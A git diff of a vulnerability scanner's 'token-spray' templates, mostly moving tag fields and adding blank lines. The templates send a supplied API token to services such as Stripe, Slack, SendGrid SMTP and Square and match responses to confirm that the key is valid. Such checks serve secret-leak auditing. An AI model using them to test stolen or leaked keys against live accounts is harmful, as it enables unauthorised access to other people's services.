https://postmarkapp.com/developer/api/overview - tags: token-spray,postmark metadata: max-request: 1 + tags: token-spray,postmark self-contained: true + http: - method: GET path: - "https://api.postmarkapp.com/server" + headers: Accept: application/json X-Postmark-Server-Token: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-prexview.yaml b/http/token-spray/api-prexview.yaml index 9e540037c6..6a9bbb11d1 100644 --- a/http/token-spray/api-prexview.yaml +++ b/http/token-spray/api-prexview.yaml @@ -8,11 +8,12 @@ info: reference: - https://prexview.com/docs/ - https://github.com/daffainfo/all-about-apikey/tree/main/prexview - tags: token-spray,prexview metadata: max-request: 1 + tags: token-spray,prexview self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-proxycrawl.yaml b/http/token-spray/api-proxycrawl.yaml index 6f74d01016..5a2a02faf8 100644 --- a/http/token-spray/api-proxycrawl.yaml +++ b/http/token-spray/api-proxycrawl.yaml @@ -8,11 +8,12 @@ info: reference: - https://proxycrawl.com/docs/ - https://github.com/daffainfo/all-about-apikey/tree/main/proxycrawl - tags: token-spray,proxycrawl metadata: max-request: 1 + tags: token-spray,proxycrawl self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-proxykingdom.yaml b/http/token-spray/api-proxykingdom.yaml index a27b687dee..e19b6743ab 100644 --- a/http/token-spray/api-proxykingdom.yaml +++ b/http/token-spray/api-proxykingdom.yaml @@ -8,11 +8,12 @@ info: reference: - https://proxykingdom.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/proxykingdom - tags: token-spray,proxykingdom metadata: max-request: 1 + tags: token-spray,proxykingdom self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-quip.yaml b/http/token-spray/api-quip.yaml index d8f1692b24..bbb18e35c4 100644 --- a/http/token-spray/api-quip.yaml +++ b/http/token-spray/api-quip.yaml @@ -8,11 +8,12 @@ info: reference: - https://quip.com/dev/automation/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/quip - tags: token-spray,quip metadata: max-request: 1 + tags: token-spray,quip self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-rijksmuseum.yaml b/http/token-spray/api-rijksmuseum.yaml index e8fc8b5c7f..cb9ce0b881 100644 --- a/http/token-spray/api-rijksmuseum.yaml +++ b/http/token-spray/api-rijksmuseum.yaml @@ -8,11 +8,12 @@ info: reference: - https://data.rijksmuseum.nl/user-generated-content/api/ - https://github.com/daffainfo/all-about-apikey/tree/main/rijksmuseum - tags: token-spray,rijksmuseum metadata: max-request: 1 + tags: token-spray,rijksmuseum self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-savepage.yaml b/http/token-spray/api-savepage.yaml index 13b5fe86be..0c5c14a2f4 100644 --- a/http/token-spray/api-savepage.yaml +++ b/http/token-spray/api-savepage.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.savepage.io - https://github.com/daffainfo/all-about-apikey/tree/main/savepage - tags: token-spray,savepage metadata: max-request: 1 + tags: token-spray,savepage self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-scanii.yaml b/http/token-spray/api-scanii.yaml index be674c0122..4611904f23 100644 --- a/http/token-spray/api-scanii.yaml +++ b/http/token-spray/api-scanii.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.scanii.com/v2.1/resources.html - https://github.com/daffainfo/all-about-apikey/tree/main/scanii - tags: token-spray,scanii metadata: max-request: 1 + tags: token-spray,scanii self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-scraperapi.yaml b/http/token-spray/api-scraperapi.yaml index 92946a74b7..69edc1dbc4 100644 --- a/http/token-spray/api-scraperapi.yaml +++ b/http/token-spray/api-scraperapi.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.scraperapi.com/documentation/ - https://github.com/daffainfo/all-about-apikey/tree/main/scraperapi - tags: token-spray,scraperapi metadata: max-request: 1 + tags: token-spray,scraperapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-scraperbox.yaml b/http/token-spray/api-scraperbox.yaml index b2fbce2091..0a437f9036 100644 --- a/http/token-spray/api-scraperbox.yaml +++ b/http/token-spray/api-scraperbox.yaml @@ -8,11 +8,12 @@ info: reference: - https://scraperbox.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/scraperbox - tags: token-spray,scraperbox metadata: max-request: 1 + tags: token-spray,scraperbox self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-scrapestack.yaml b/http/token-spray/api-scrapestack.yaml index f2e9f64ff3..2b8dbef08f 100644 --- a/http/token-spray/api-scrapestack.yaml +++ b/http/token-spray/api-scrapestack.yaml @@ -8,11 +8,12 @@ info: reference: - https://scrapestack.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/scrapestack - tags: token-spray,scrapestack metadata: max-request: 1 + tags: token-spray,scrapestack self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-scrapingant.yaml b/http/token-spray/api-scrapingant.yaml index 4858f1eefb..df81288f69 100644 --- a/http/token-spray/api-scrapingant.yaml +++ b/http/token-spray/api-scrapingant.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.scrapingant.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/scrapingant - tags: token-spray,scrapingant metadata: max-request: 1 + tags: token-spray,scrapingant self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-scrapingdog.yaml b/http/token-spray/api-scrapingdog.yaml index 265b220d2f..515a8cb3ae 100644 --- a/http/token-spray/api-scrapingdog.yaml +++ b/http/token-spray/api-scrapingdog.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.scrapingdog.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/scrapingdog - tags: token-spray,scrapingdog metadata: max-request: 1 + tags: token-spray,scrapingdog self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-screenshotapi.yaml b/http/token-spray/api-screenshotapi.yaml index 71ebe5148f..ef1418e6ac 100644 --- a/http/token-spray/api-screenshotapi.yaml +++ b/http/token-spray/api-screenshotapi.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.screenshotapi.net/?ref=webflow - https://github.com/daffainfo/all-about-apikey/tree/main/screenshot-api - tags: token-spray,screenshotapi metadata: max-request: 1 + tags: token-spray,screenshotapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-securitytrails.yaml b/http/token-spray/api-securitytrails.yaml index 2963d10ea1..e5af5ee072 100644 --- a/http/token-spray/api-securitytrails.yaml +++ b/http/token-spray/api-securitytrails.yaml @@ -8,18 +8,19 @@ info: - https://securitytrails.com - https://docs.securitytrails.com - https://securitytrails.com/corp/api - tags: recon,securitytrails,token-spray metadata: max-request: 1 + tags: recon,securitytrails,token-spray self-contained: true + http: - method: GET path: - https://api.securitytrails.com/v1/ping + headers: APIKey: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-segment.yaml b/http/token-spray/api-segment.yaml index 8720635ecc..fc4347b1d6 100644 --- a/http/token-spray/api-segment.yaml +++ b/http/token-spray/api-segment.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://reference.segmentapis.com/ - tags: token-spray,segment metadata: max-request: 1 + tags: token-spray,segment self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-sendgrid.yaml b/http/token-spray/api-sendgrid.yaml index d08107a28e..b132525e9d 100644 --- a/http/token-spray/api-sendgrid.yaml +++ b/http/token-spray/api-sendgrid.yaml @@ -6,20 +6,20 @@ info: severity: info reference: - https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp - tags: token-spray,sendgrid metadata: max-request: 1 + tags: token-spray,sendgrid self-contained: true tcp: - inputs: - data: "ehlo\r\n" read: 1024 + - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" read: 1024 host: - "tls://smtp.sendgrid.net:465" - matchers: - type: word words: diff --git a/http/token-spray/api-sentry.yaml b/http/token-spray/api-sentry.yaml index aeb0df4fad..a0e3bbbbc1 100644 --- a/http/token-spray/api-sentry.yaml +++ b/http/token-spray/api-sentry.yaml @@ -8,18 +8,19 @@ info: - https://sentry.io - https://docs.sentry.io - https://docs.sentry.io/api/auth - tags: sentry,tracing,tracking,monitoring,token-spray metadata: max-request: 1 + tags: sentry,tracing,tracking,monitoring,token-spray self-contained: true + http: - method: GET path: - "https://sentry.io/api/0/projects/" + headers: Authorization: Bearer {{token}} - matchers: - type: status status: diff --git a/http/token-spray/api-serpstack.yaml b/http/token-spray/api-serpstack.yaml index 39f401638c..5238e7ac7f 100644 --- a/http/token-spray/api-serpstack.yaml +++ b/http/token-spray/api-serpstack.yaml @@ -8,11 +8,12 @@ info: reference: - https://serpstack.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/serpstack - tags: token-spray,serpstack metadata: max-request: 1 + tags: token-spray,serpstack self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-shodan.yaml b/http/token-spray/api-shodan.yaml index 80eb89fdc9..cb5cb8386c 100644 --- a/http/token-spray/api-shodan.yaml +++ b/http/token-spray/api-shodan.yaml @@ -10,11 +10,12 @@ info: - https://shodan.io - https://developer.shodan.io - https://developer.shodan.io/api - tags: recon,shodan,token-spray metadata: max-request: 1 + tags: recon,shodan,token-spray self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-slack.yaml b/http/token-spray/api-slack.yaml index be7e00c81a..54397d792c 100644 --- a/http/token-spray/api-slack.yaml +++ b/http/token-spray/api-slack.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://api.slack.com/methods/auth.test - tags: token-spray,slack metadata: max-request: 1 + tags: token-spray,slack self-contained: true + http: - method: POST path: - "https://slack.com/api/auth.test" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body @@ -25,4 +26,4 @@ http: - '"url":' - '"team_id":' - '"user_id":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-smartsheet.yaml b/http/token-spray/api-smartsheet.yaml index f33679ede9..87973fb92e 100644 --- a/http/token-spray/api-smartsheet.yaml +++ b/http/token-spray/api-smartsheet.yaml @@ -8,15 +8,17 @@ info: reference: - https://smartsheet.redoc.ly/ - https://github.com/daffainfo/all-about-apikey/tree/main/smartsheet - tags: token-spray,smartsheet metadata: max-request: 1 + tags: token-spray,smartsheet self-contained: true + http: - method: GET path: - "https://api.smartsheet.com/2.0/home?include=source" + headers: Authorization: Bearer {{token}} diff --git a/http/token-spray/api-sonarcloud.yaml b/http/token-spray/api-sonarcloud.yaml index f2922f1368..e3bb3f0a56 100644 --- a/http/token-spray/api-sonarcloud.yaml +++ b/http/token-spray/api-sonarcloud.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://sonarcloud.io/web_api/api/authentication - tags: token-spray,sonarcloud metadata: max-request: 1 + tags: token-spray,sonarcloud self-contained: true + http: - method: GET path: - "https://sonarcloud.io/api/authentication/validate" + headers: Authorization: Basic {{base64(token + ':')}} - matchers: - type: word part: body diff --git a/http/token-spray/api-spotify.yaml b/http/token-spray/api-spotify.yaml index 453f8d1294..b285497924 100644 --- a/http/token-spray/api-spotify.yaml +++ b/http/token-spray/api-spotify.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://developer.spotify.com/documentation/general/guides/authorization-guide/ - tags: token-spray,spotify metadata: max-request: 1 + tags: token-spray,spotify self-contained: true + http: - method: GET path: - "https://api.spotify.com/v1/me/player/devices" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body @@ -25,4 +26,4 @@ http: - '"devices":' - '"id":' - '"is_active":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-square.yaml b/http/token-spray/api-square.yaml index 88b6af7cf8..895c3422eb 100644 --- a/http/token-spray/api-square.yaml +++ b/http/token-spray/api-square.yaml @@ -8,20 +8,21 @@ info: reference: - https://developer.squareup.com/explorer/square/locations-api/list-locations - https://github.com/daffainfo/all-about-apikey/tree/main/square - tags: token-spray,square metadata: max-request: 2 + tags: token-spray,square self-contained: true + http: - method: GET path: - "https://connect.squareup.com/v2/locations" - "https://connect.squareupsandbox.com/v2/locations" + headers: Content-Type: application/json Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-sslmate.yaml b/http/token-spray/api-sslmate.yaml index 15335e3646..592a0bcb60 100644 --- a/http/token-spray/api-sslmate.yaml +++ b/http/token-spray/api-sslmate.yaml @@ -8,18 +8,19 @@ info: - https://sslmate.com - https://sslmate.com/help/ - https://sslmate.com/help/reference/apiv2 - tags: recon,sslmate,token-spray metadata: max-request: 1 + tags: recon,sslmate,token-spray self-contained: true + http: - method: GET path: - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-strava.yaml b/http/token-spray/api-strava.yaml index bcb12f9a3e..3851732bb2 100644 --- a/http/token-spray/api-strava.yaml +++ b/http/token-spray/api-strava.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://developers.strava.com/docs/getting-started/ - tags: token-spray,strava metadata: max-request: 1 + tags: token-spray,strava self-contained: true + http: - method: GET path: - "https://www.strava.com/api/v3/athlete" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-stripe.yaml b/http/token-spray/api-stripe.yaml index 9ee8833d45..e014374fdf 100644 --- a/http/token-spray/api-stripe.yaml +++ b/http/token-spray/api-stripe.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://stripe.com/docs/api/authentication - tags: token-spray,stripe metadata: max-request: 1 + tags: token-spray,stripe self-contained: true + http: - method: GET path: - "https://api.stripe.com/v1/charges" + headers: Authorization: Basic {{base64(token + ':')}} - matchers: - type: word part: body @@ -25,4 +26,4 @@ http: - '"object":' - '"url":' - '"data":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-stytch.yaml b/http/token-spray/api-stytch.yaml index 82e0b8d260..3efbdbdb54 100644 --- a/http/token-spray/api-stytch.yaml +++ b/http/token-spray/api-stytch.yaml @@ -8,11 +8,12 @@ info: reference: - https://stytch.com/docs/api - https://github.com/daffainfo/all-about-apikey/tree/main/stytch - tags: token-spray,stytch metadata: max-request: 1 + tags: token-spray,stytch self-contained: true + http: - raw: - | @@ -30,4 +31,4 @@ http: - '"status_code":' - '"request_id":' - '"user_id":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-supportivekoala.yaml b/http/token-spray/api-supportivekoala.yaml index fbad95ba85..876929bb30 100644 --- a/http/token-spray/api-supportivekoala.yaml +++ b/http/token-spray/api-supportivekoala.yaml @@ -8,11 +8,12 @@ info: reference: - https://developers.supportivekoala.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/supportivekoala - tags: token-spray,supportivekoala metadata: max-request: 1 + tags: token-spray,supportivekoala self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-taiga.yaml b/http/token-spray/api-taiga.yaml index b8f0afda11..92a1543ab9 100644 --- a/http/token-spray/api-taiga.yaml +++ b/http/token-spray/api-taiga.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://docs.taiga.io/api.html - tags: token-spray,taiga metadata: max-request: 1 + tags: token-spray,taiga self-contained: true + http: - method: GET path: - "https://api.taiga.io/api/v1/application-tokens" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-tatum.yaml b/http/token-spray/api-tatum.yaml index 43b2ed60c1..60fdf59526 100644 --- a/http/token-spray/api-tatum.yaml +++ b/http/token-spray/api-tatum.yaml @@ -7,11 +7,12 @@ info: reference: - https://apidoc.tatum.io/#tag/Node-RPC - https://docs.tatum.io - tags: defi,dapp,token-spray,blockchain metadata: max-request: 1 + tags: defi,dapp,token-spray,blockchain self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-thecatapi.yaml b/http/token-spray/api-thecatapi.yaml index a73ebc5244..fc69ece569 100644 --- a/http/token-spray/api-thecatapi.yaml +++ b/http/token-spray/api-thecatapi.yaml @@ -8,22 +8,23 @@ info: reference: - https://docs.thecatapi.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/thecatapi - tags: token-spray,thecatapi metadata: max-request: 1 + tags: token-spray,thecatapi self-contained: true + http: - method: GET path: - "https://api.thecatapi.com/v1/votes" + headers: x-api-key: "{{token}}" - matchers: - type: word part: body words: - '"country_code":' - '"created_at":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-thedogapi.yaml b/http/token-spray/api-thedogapi.yaml index 1d24b79e92..f4b65986ca 100644 --- a/http/token-spray/api-thedogapi.yaml +++ b/http/token-spray/api-thedogapi.yaml @@ -8,18 +8,19 @@ info: reference: - https://docs.thedogapi.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/thedogapi - tags: token-spray,thedogapi metadata: max-request: 1 + tags: token-spray,thedogapi self-contained: true + http: - method: GET path: - "https://api.thedogapi.com/v1/votes" + headers: x-api-key: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-ticketmaster.yaml b/http/token-spray/api-ticketmaster.yaml index d5e43f2f07..2c14a80f68 100644 --- a/http/token-spray/api-ticketmaster.yaml +++ b/http/token-spray/api-ticketmaster.yaml @@ -7,15 +7,17 @@ info: reference: - https://developer.ticketmaster.com/products-and-docs/apis/getting-started/ metadata: - max-request: 1 verified: true + max-request: 1 tags: token-spray,ticketmaster self-contained: true + http: - method: GET path: - "https://app.ticketmaster.com/discovery/v2/events.json?apikey={{token}}" + matchers: - type: word part: body diff --git a/http/token-spray/api-tink.yaml b/http/token-spray/api-tink.yaml index f51781bc8f..e75f8c3c78 100644 --- a/http/token-spray/api-tink.yaml +++ b/http/token-spray/api-tink.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://docs.tink.com/api - tags: token-spray,tink metadata: max-request: 1 + tags: token-spray,tink self-contained: true + http: - method: GET path: - "https://api.tink.com/api/v1/user" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-tinypng.yaml b/http/token-spray/api-tinypng.yaml index 0268df4894..3f95f9889a 100644 --- a/http/token-spray/api-tinypng.yaml +++ b/http/token-spray/api-tinypng.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://tinypng.com/developers - tags: token-spray,tinypng metadata: max-request: 1 + tags: token-spray,tinypng self-contained: true + http: - method: POST path: - "https://api.tinify.com/shrink" + headers: Authorization: Basic {{base64('api:' + token)}} - matchers: - type: word part: header diff --git a/http/token-spray/api-todoist.yaml b/http/token-spray/api-todoist.yaml index 350c16e728..7af47eabed 100644 --- a/http/token-spray/api-todoist.yaml +++ b/http/token-spray/api-todoist.yaml @@ -8,11 +8,12 @@ info: reference: - https://developer.todoist.com/rest/v1/#overview - https://github.com/daffainfo/all-about-apikey/tree/main/todoist - tags: token-spray,todoist metadata: max-request: 1 + tags: token-spray,todoist self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-trello.yaml b/http/token-spray/api-trello.yaml index 7a5988648a..8ffc99ff02 100644 --- a/http/token-spray/api-trello.yaml +++ b/http/token-spray/api-trello.yaml @@ -8,11 +8,12 @@ info: reference: - https://developers.trello.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/trello - tags: token-spray,trello metadata: max-request: 1 + tags: token-spray,trello self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-twitter.yaml b/http/token-spray/api-twitter.yaml index e8a7ea10f8..3c831a5ad3 100644 --- a/http/token-spray/api-twitter.yaml +++ b/http/token-spray/api-twitter.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://developer.twitter.com/en/docs/twitter-api/api-reference-index - tags: token-spray,twitter metadata: max-request: 1 + tags: token-spray,twitter self-contained: true + http: - method: GET path: - "https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-urlscan.yaml b/http/token-spray/api-urlscan.yaml index ffb252bd6d..c7c4664913 100644 --- a/http/token-spray/api-urlscan.yaml +++ b/http/token-spray/api-urlscan.yaml @@ -8,11 +8,12 @@ info: reference: - https://urlscan.io/docs/api/ - https://github.com/daffainfo/all-about-apikey/tree/main/urlscan - tags: token-spray,urlscan metadata: max-request: 1 + tags: token-spray,urlscan self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-userstack.yaml b/http/token-spray/api-userstack.yaml index ea3f7e7cb6..701460382d 100644 --- a/http/token-spray/api-userstack.yaml +++ b/http/token-spray/api-userstack.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://userstack.com/documentation - tags: token-spray,userstack metadata: max-request: 1 + tags: token-spray,userstack self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-vercel.yaml b/http/token-spray/api-vercel.yaml index 2be908b931..158630265a 100644 --- a/http/token-spray/api-vercel.yaml +++ b/http/token-spray/api-vercel.yaml @@ -9,20 +9,21 @@ info: - https://vercel.com/docs/rest-api classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: token-spray,vercel metadata: max-request: 1 + tags: token-spray,vercel self-contained: true + http: - method: GET path: - "https://api.vercel.com/www/user" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-virustotal.yaml b/http/token-spray/api-virustotal.yaml index e83cf52988..d4c754172f 100644 --- a/http/token-spray/api-virustotal.yaml +++ b/http/token-spray/api-virustotal.yaml @@ -7,11 +7,12 @@ info: reference: - https://developers.virustotal.com/reference - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md - tags: token-spray,virustotal metadata: max-request: 1 + tags: token-spray,virustotal self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-visualstudio.yaml b/http/token-spray/api-visualstudio.yaml index 2a8f9b5e0a..29d53ea144 100644 --- a/http/token-spray/api-visualstudio.yaml +++ b/http/token-spray/api-visualstudio.yaml @@ -6,19 +6,20 @@ info: severity: info reference: - https://openapi.appcenter.ms/ - tags: token-spray,visualstudio,microsoft metadata: max-request: 1 + tags: token-spray,visualstudio,microsoft self-contained: true + http: - method: GET path: - "https://api.appcenter.ms/v0.1/apps" + headers: Content-Type: application/json X-Api-Token: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-wakatime.yaml b/http/token-spray/api-wakatime.yaml index 3cb0429a38..9c24f1e9a8 100644 --- a/http/token-spray/api-wakatime.yaml +++ b/http/token-spray/api-wakatime.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://wakatime.com/developers - tags: token-spray,wakatime metadata: max-request: 1 + tags: token-spray,wakatime self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-web3storage.yaml b/http/token-spray/api-web3storage.yaml index 9c1d1209f0..bb05b04dd0 100644 --- a/http/token-spray/api-web3storage.yaml +++ b/http/token-spray/api-web3storage.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.web3.storage/ - https://github.com/daffainfo/all-about-apikey/tree/main/web3-storage - tags: token-spray,web3storage metadata: max-request: 1 + tags: token-spray,web3storage,intrusive self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-webex.yaml b/http/token-spray/api-webex.yaml index 6484fee4c8..27765fc3b8 100644 --- a/http/token-spray/api-webex.yaml +++ b/http/token-spray/api-webex.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://developer.webex.com/docs/getting-started - tags: token-spray,cisco,webex metadata: max-request: 1 + tags: token-spray,cisco,webex self-contained: true + http: - method: GET path: - "https://webexapis.com/v1/rooms" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-weglot.yaml b/http/token-spray/api-weglot.yaml index a50a7baf21..f63c8dc121 100644 --- a/http/token-spray/api-weglot.yaml +++ b/http/token-spray/api-weglot.yaml @@ -6,19 +6,21 @@ info: severity: info reference: - https://developers.weglot.com/api/reference - tags: token-spray,weglot metadata: max-request: 1 + tags: token-spray,weglot self-contained: true + http: - method: POST path: - "https://api.weglot.com/translate?api_key={{token}}" + headers: Content-Type: application/json - body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" + body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" matchers: - type: word part: body diff --git a/http/token-spray/api-wordcloud.yaml b/http/token-spray/api-wordcloud.yaml index 4c38975bbd..60b9060d08 100644 --- a/http/token-spray/api-wordcloud.yaml +++ b/http/token-spray/api-wordcloud.yaml @@ -8,11 +8,12 @@ info: reference: - https://wordcloudapi.com/getting-started - https://github.com/daffainfo/all-about-apikey/tree/main/word-cloud - tags: token-spray,wordcloud metadata: max-request: 1 + tags: token-spray,wordcloud self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-wordnik.yaml b/http/token-spray/api-wordnik.yaml index 5a955a0c73..e25ff47a87 100644 --- a/http/token-spray/api-wordnik.yaml +++ b/http/token-spray/api-wordnik.yaml @@ -8,11 +8,12 @@ info: reference: - https://developer.wordnik.com/docs - https://github.com/daffainfo/all-about-apikey/tree/main/wordnik - tags: token-spray,wordnik metadata: max-request: 1 + tags: token-spray,wordnik self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-youtube.yaml b/http/token-spray/api-youtube.yaml index 80863aac58..e67fb289c4 100644 --- a/http/token-spray/api-youtube.yaml +++ b/http/token-spray/api-youtube.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://developers.google.com/youtube/v3/docs - tags: token-spray,youtube metadata: max-request: 1 + tags: token-spray,youtube self-contained: true + http: - method: GET path: @@ -22,4 +23,4 @@ http: words: - '"kind":' - '"pageInfo":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-zenrows.yaml b/http/token-spray/api-zenrows.yaml index 987a0c9c66..aaf326db35 100644 --- a/http/token-spray/api-zenrows.yaml +++ b/http/token-spray/api-zenrows.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.zenrows.com/documentation/ - https://github.com/daffainfo/all-about-apikey/tree/main/zenrows - tags: token-spray,zenrows metadata: max-request: 1 + tags: token-spray,zenrows self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-zerbounce.yaml b/http/token-spray/api-zerbounce.yaml index 8ca6a4ddfc..87e6a1bd28 100644 --- a/http/token-spray/api-zerbounce.yaml +++ b/http/token-spray/api-zerbounce.yaml @@ -7,15 +7,17 @@ info: reference: - https://www.zerobounce.net/docs/email-validation-api-quickstart metadata: - max-request: 1 verified: true + max-request: 1 tags: token-spray,zerobounce self-contained: true + http: - method: GET path: - "https://api.zerobounce.net/v2/getapiusage?api_key={{token}}&start_date=2018-01-01&end_date=2019-12-12" + matchers: - type: word part: body diff --git a/http/token-spray/api-zoomeye.yaml b/http/token-spray/api-zoomeye.yaml index 81a529a47e..d5c22b4c43 100644 --- a/http/token-spray/api-zoomeye.yaml +++ b/http/token-spray/api-zoomeye.yaml @@ -9,18 +9,19 @@ info: reference: - https://zoomeye.org - https://zoomeye.org/doc - tags: recon,zoomeye,token-spray metadata: max-request: 1 + tags: recon,zoomeye,token-spray self-contained: true + http: - method: GET path: - https://api.zoomeye.org/resources-info + headers: API-KEY: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/google-autocomplete.yaml b/http/token-spray/google-autocomplete.yaml index 6a3b894c1b..e4ba49d6c3 100644 --- a/http/token-spray/google-autocomplete.yaml +++ b/http/token-spray/google-autocomplete.yaml @@ -4,11 +4,12 @@ info: name: Google Autocomplete API Test author: zzeitlin severity: info - tags: token-spray,google,autocomplete metadata: max-request: 1 + tags: token-spray,google,autocomplete self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-books.yaml b/http/token-spray/google-books.yaml index 0b1dc7fd04..215368a820 100644 --- a/http/token-spray/google-books.yaml +++ b/http/token-spray/google-books.yaml @@ -8,11 +8,12 @@ info: reference: - https://developers.google.com/books/docs/overview - https://github.com/daffainfo/all-about-apikey/tree/main/google-books - tags: token-spray,google,books metadata: max-request: 1 + tags: token-spray,google,books self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-customsearch.yaml b/http/token-spray/google-customsearch.yaml index e0f0820412..68dd62c809 100644 --- a/http/token-spray/google-customsearch.yaml +++ b/http/token-spray/google-customsearch.yaml @@ -4,11 +4,12 @@ info: name: Google Custom Search API Test author: zzeitlin severity: info - tags: token-spray,google,search metadata: max-request: 1 + tags: token-spray,google,search self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-directions.yaml b/http/token-spray/google-directions.yaml index a0e473ae34..c7e719fcf1 100644 --- a/http/token-spray/google-directions.yaml +++ b/http/token-spray/google-directions.yaml @@ -4,11 +4,12 @@ info: name: Google Directions API Test author: zzeitlin severity: info - tags: token-spray,google,directions metadata: max-request: 1 + tags: token-spray,google,directions self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-elevation.yaml b/http/token-spray/google-elevation.yaml index c1782e176f..b987ca20ce 100644 --- a/http/token-spray/google-elevation.yaml +++ b/http/token-spray/google-elevation.yaml @@ -4,11 +4,12 @@ info: name: Google Elevation API Test author: zzeitlin severity: info - tags: token-spray,google,elevation metadata: max-request: 1 + tags: token-spray,google,elevation self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-fcm.yaml b/http/token-spray/google-fcm.yaml index 0b712da38b..dbc7fe6026 100644 --- a/http/token-spray/google-fcm.yaml +++ b/http/token-spray/google-fcm.yaml @@ -4,20 +4,22 @@ info: name: Google FCM API Test author: zzeitlin severity: info - tags: token-spray,google,fcm,firebase,cloud,messaging metadata: max-request: 1 + tags: 